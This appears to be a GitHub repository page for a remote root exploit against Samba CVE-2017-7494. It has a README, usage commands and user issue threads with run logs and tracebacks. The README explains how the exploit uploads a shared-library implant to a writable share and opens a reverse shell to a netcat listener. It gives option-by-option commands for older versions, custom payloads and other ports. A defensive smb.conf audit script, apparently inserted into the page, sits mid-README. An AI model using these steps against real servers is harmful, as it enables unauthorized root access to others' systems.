joxeankoret / cve-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

License: GNU General Public License v3.0

Makefile 0.01% C 0.07% Python 99.88% Batchfile 0.01% Shell 0.04%

Introduction

CVE-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability.

Details

This exploit is divided into two parts:

  • First, it compiles a payload called "implant.c" into a shared library (libimplantx32.so or libimplantx64.so) that switches to the root user, detaches from the parent process and spawns a reverse shell.
  • Second, it finds a writable share on the specified target host, uploads the library under a random name and tries to load it.

As long as the target is vulnerable and the payload is the correct one for the target operating system and architecture, the exploit is 100% reliable.
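The two preconditions described above (a share the client can write to, and a server that will load a library from that path) are also what a defender can check for. The script below is an added example, not code from the repository: it parses an smb.conf, flags every writable share together with whether guests can reach it, and reports when the `nt pipe support = no` workaround that the Samba advisory for CVE-2017-7494 documents is missing from [global]. The sample configurations embedded in it are constructed for the example.

```python
"""Audit a Samba smb.conf for the exposure the SambaCry exploit relies on.

Added example, not part of the cve-2017-7494 repository. It checks for:
  * shares that are writable (writable/writeable = yes, or read only = no),
  * whether such shares are reachable by guests (guest ok/public = yes),
  * whether the documented workaround 'nt pipe support = no' is set in [global].
"""

# Constructed sample: a guest-writable share and no workaround set.
EXPOSED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[print$]
   path = /var/lib/samba/printers
   read only = no
   guest ok = yes

[docs]
   path = /usr/share/doc
   read only = yes
"""

# Constructed sample: same shares after applying the workaround and
# removing write access.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   nt pipe support = no

[print$]
   path = /var/lib/samba/printers
   read only = yes

[docs]
   path = /usr/share/doc
   read only = yes
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: returns {section: {key: value}} with lower-cased names."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def is_true(value):
    return value.strip().lower() in TRUE_VALUES


def share_is_writable(opts):
    """Samba accepts 'writable'/'writeable' = yes or 'read only' = no; default is read-only."""
    for key in ("writable", "writeable"):
        if key in opts:
            return is_true(opts[key])
    if "read only" in opts:
        return not is_true(opts["read only"])
    return False


def share_allows_guest(opts):
    """'guest ok' and its synonym 'public' control anonymous access to a share."""
    for key in ("guest ok", "public"):
        if key in opts:
            return is_true(opts[key])
    return False


def audit(conf):
    """Return a list of human-readable findings; an empty list means no exposure found."""
    findings = []
    global_opts = conf.get("global", {})
    # Samba defaults 'nt pipe support' to yes; the workaround sets it to no.
    if is_true(global_opts.get("nt pipe support", "yes")):
        findings.append("global: 'nt pipe support = no' workaround not set")
    for name, opts in conf.items():
        if name == "global":
            continue
        if share_is_writable(opts):
            who = "guests" if share_allows_guest(opts) else "authenticated users"
            findings.append(f"share [{name}] at {opts.get('path', '?')} is writable by {who}")
    return findings


if __name__ == "__main__":
    for label, text in (("exposed", EXPOSED_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"== {label} ==")
        for finding in audit(parse_smb_conf(text)) or ["no findings"]:
            print("  " + finding)
```

Run it against a real file by replacing the embedded samples with `open("/etc/samba/smb.conf").read()`; the parser ignores `include =` directives, so audit any included files separately. Setting `nt pipe support = no` is a workaround that breaks some Windows client functionality, so the durable fix remains upgrading to a patched Samba release.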

How to

In your machine, run the following command:

$ nc -p 31337 -l

Then, run the exploit against your target and wait until it connects back to your Netcat:

$ python cve_2017_7494.py -t target_ip

If you close the reverse shell too fast, instead of running the exploit again (uploading the module, etc.) you can just pass the path to the module it already uploaded. Supposing it was uploaded to /shared/directory/ as "module.so", you would run a command like the following one:

$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

UPDATE 11/25/2017 - Archivaldo

You can now run the exploit against samba 3.5.0 and 3.6.0; you just need to add the argument -o 1:

python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

You can now use your own custom .so:

python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

In case you need to run this script from an x86 machine, compiling the implant binaries will create two x86 files. Using the flag -n 1 you can disable compilation and copy a libimplantx64.so built on another machine instead:

python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

In case samba runs only on port 139, you can set the remote server port using the argument -p:

python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTES

I do not support it anymore.

-- Joxean Koret


Issues

how does this determine the full path?

I am trying to use this exploit against a samba 3.5.11 server but it's not working out of the box. The writable share is called /test and this exploit is trying to use the full path /usr/local/samba/tmp/. I am going through the source but thought it might be useful to ask directly how this exploit is determining this path.

Thank you!

root@kali:/CVE-2017-7494# python cve_2017_7494.py -t 10.11.1.129
[Sun Dec 16 10:21:39 2018] Building libraries...
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx64.so
gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
[Sun Dec 16 10:21:39 2018] Logging into the Samba server 10.11.1.129:445
[Sun Dec 16 10:21:40 2018] Using a GUEST session
[Sun Dec 16 10:21:40 2018] Using libimplantx64.so
[Sun Dec 16 10:21:40 2018] Trying to copy library 'T1XOvrsK.so' to share '[u'test', u'/usr/local/samba/tmp']'
[Sun Dec 16 10:21:41 2018] Done!
[Sun Dec 16 10:21:41 2018] Trying to copy random library T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Trying to load module /usr/local/samba/tmp/T1XOvrsK.so
[Sun Dec 16 10:21:41 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Failed to locate the module

Hello,

I was trying to run the exploit, but always got the same message: it seems like the exploit doesn't find the module on the target.

Any help to get this working? I tried to upload the module using smbclient, but still got the same message.

PS. If the no-compile option is 0, I got several library errors for 32 bits.

python cve_2017_7494.py -t 172.16.1.107 -p 445 --rhost=172.20.1.162 --rport=443 -m //libimplantx64.so --no-compile=1
[Wed Sep 5 10:53:05 2018] I will keep the current binaries. No need for new compilation.
[Wed Sep 5 10:53:05 2018] Logging into the Samba server 172.16.1.107:445
[Wed Sep 5 10:53:06 2018] Using a GUEST session
[Wed Sep 5 10:53:06 2018] Trying to load module /
/libimplantx64.so
[Wed Sep 5 10:53:07 2018] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

SMB SessionError

Need help on this
[Mon Nov 23 23:34:38 2020] I will keep the current binaries. No need for new compilation.
[Mon Nov 23 23:34:38 2020] Logging into the Samba server 10.0.2.18:445
[Mon Nov 23 23:34:38 2020] Using a GUEST session
[Mon Nov 23 23:34:38 2020] Using libimplantx64.so
[Mon Nov 23 23:34:38 2020] Trying to copy library 'JJAnPsko.so' to share '[u'print$', u'/var/lib/samba/printers']'
[Mon Nov 23 23:34:38 2020] Done!
[Mon Nov 23 23:34:38 2020] Trying to copy random library JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Trying to load module /var/lib/samba/printers/JJAnPsko.so
[Mon Nov 23 23:34:38 2020] Error: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

No module named Util.number

I've cloned the master branch, I've installed the requirements via a venv, and I get this error when running the exploit.

python2 cve_2017_7494.py -t 192.168.1.84 
Traceback (most recent call last):
  File "cve_2017_7494.py", line 20, in <module>
    from impacket.dcerpc.v5 import transport, srvs
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/dcerpc/v5/transport.py", line 18, in <module>
    from impacket.smbconnection import smb, SMBConnection
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smbconnection.py", line 20, in <module>
    from impacket import smb, smb3, nmb, nt_errors, LOG
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/smb.py", line 53, in <module>
    from impacket.krb5.gssapi import KRB5_AP_REQ
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/gssapi.py", line 17, in <module>
    from Crypto.Hash import HMAC, MD5
  File "/mnt/VulnHub/EVM/CVE-2017-7494/impacket/krb5/Crypto.py", line 48, in <module>
    from Crypto.Util.number import GCD as gcd
ImportError: No module named Util.number

I've installed both packages :

# pip install pycrypto
# pip show pycrypto
Name: pycrypto
Version: 2.6.1
Summary: Cryptographic modules for Python.
Home-page: http://www.pycrypto.org/
Author: Dwayne C. Litzenberger
Author-email: [email protected]
License: UNKNOWN
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires: 
Required-by: 
# pip install pycryptodome
# pip show pycryptodome
Name: pycryptodome
Version: 3.10.1
Summary: Cryptographic library for Python
Home-page: https://www.pycryptodome.org
Author: Helder Eijs
Author-email: [email protected]
License: BSD, Public Domain
Location: /root/.virtualenvs/CVE-2017-7494/lib/python3.9/site-packages
Requires: 
Required-by: 

What have I done wrong ? Any ideas ? Thanks :)

Cannot resolve local IP address.

Traceback (most recent call last):
  File "cve_2017_7494.py", line 212, in <module>
    main()
  File "cve_2017_7494.py", line 206, in main
    if exploit.exploit():
  File "cve_2017_7494.py", line 161, in exploit
    if not self.make_library():
  File "cve_2017_7494.py", line 89, in make_library
    raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!

Error in test

Dear Joxean,

I'm testing one of my vulnerable machines with samba smbd 4.3.8-Ubuntu, and found your code.
I tried to reproduce the exploit but this is the error which I got:

python cve_2017_7494.py -t 192.168.1.220
Traceback (most recent call last):
  File "cve_2017_7494.py", line 212, in <module>
    main()
  File "cve_2017_7494.py", line 206, in main
    if exploit.exploit():
  File "cve_2017_7494.py", line 161, in exploit
    if not self.make_library():
  File "cve_2017_7494.py", line 89, in make_library
    raise Exception("Cannot resolve local IP address!")
Exception: Cannot resolve local IP address!

Can you tell me where I went wrong? Do I need to change the IP address in the config file?

Thank you so much for your help.

How to use it?

Hi, I'm very curious about how to use it.
Can you add a tutorial to use it?

Thanks. Great job.

Ubuntu 18.04 running error

gcc -shared -fPIC -Wall -Wno-nonnull implant.c -o libimplantx32.so -m32
In file included from implant.c:16:0:
/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: No such file or directory
 #include <bits/libc-header-start.h>
          ^~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
Makefile:10: recipe for target 'libimplantx32.so' failed
make: *** [libimplantx32.so] Error 1

IOError: [Errno 2] No such file or directory: 'libimplantx64.so'

Trying to use the exploit on port 139:
python cve_2017_7494.py -t -p 139 --rhost --rport 31337 -n 1

and I got this output:

[..] I will keep the current binaries. No need for new compilation.
[..] Logging into the Samba server ip:port
[..] Using a GUEST session
[..] Using libimplantx64.so
[..] Trying to copy library 'n5R8qbmA.so' to share '[u'docs', u'/usr/share/doc']'
Traceback (most recent call last):
  File "cve_2017_7494.py", line 254, in <module>
    main()
  File "cve_2017_7494.py", line 248, in main
    if exploit.exploit():
  File "cve_2017_7494.py", line 196, in exploit
    server_directory = self.try_copy_library(lib_name)
  File "cve_2017_7494.py", line 165, in try_copy_library
    if self.try_put(share, lib_name, real_file):
  File "cve_2017_7494.py", line 117, in try_put
    with open(real_file, "rb") as f:
IOError: [Errno 2] No such file or directory: 'libimplantx64.so'
